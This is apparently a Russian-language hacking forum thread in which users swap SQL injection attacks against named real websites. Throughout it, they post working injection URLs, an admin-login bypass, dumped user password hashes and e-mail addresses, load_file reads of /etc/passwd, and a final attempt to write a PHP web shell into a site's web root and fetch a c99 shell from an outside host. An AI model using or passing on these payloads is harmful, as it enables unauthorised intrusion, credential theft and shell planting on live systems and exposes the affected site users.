Скажите вот есть сайт: При вводе кавычек нет ошибки (пробовал '; -- и ' vav va). Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
там нету, но есть например здесь Code: http://oxta.ru/news.php?y=2009&m=12+and+5=5 и кстати не стоит замарачиваться, тут тот тоже скуля есть: http://oxta.ru/admin login: 'or+5=5/* password: asdfg удачи
select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70' Можно в админку попасть тут?
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно? Code: select * from users where login='admin' or 1=1+--+' если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
select * from users where login='admin' or 1=1/*' and passwd='202cb962ac59075b964b07152d234b70' Точно не уверен,попробуй
Да, комменты я пробовал - не получалось. Неправильно делал. Я забыл про закрывающую кавычку и камент, сделал так select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70' пустило.
на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+information_schema.tables),1,1))>117/* как дальше продолжеть? так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
может схемы просто нет (ветка ниже) или код символа ниже возьми... скрипт (нижний пост) заюзай хоть и на пхп или другой инструмент возьми, если слепая.
там внизу под ошибкой sql стоит [XT SQL Error] что это?? и ище очень часто я встречяюсь с этим You have an error in your SQL syntax;................... [TEP STOP] и разкрутить вроде неразу не удалось.. что это может быть?
Ну смотрим кто что скажет... выпригует алерт с ошибкой выполнения запроса (логирования)... самое интересное что это компания которая проводит аудит безопасности И вот тоже как блинд крутить можно ... О компании с юнион мну не получилось...
MySQL версия 5.0.67 Data Бaзы:information_schema b10160_forum b10160_fresh b10160_linsm Current User: [email protected] Code: http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5-- ~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений'[email protected]'~3'~
молодец ступил просто когда посылал то контент выводился, а когда нет , и решил шо 4 поля, +++ Сайт походу умер, за ним не следять так как Copyright © 2008, LINS-M... Просто целесообразно текущий год ставить, имхо...
Дальше сам PHP: http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version(),3,4,5--
PHP: http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),database(),user()),30,31,32,33,34,35,36,37,38,39/* ...
вот есть саyт.. версия 4.1.18..есть mysql.user и file_priv Y.. хочу заливать шелл.. читаю /etc/passwd http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+ а потом '/' http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+ а здесь видно папка http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+ и потом здеlaю так.. http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/* http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt? и не получается обшем поjaлуста помоqите заливат шелл
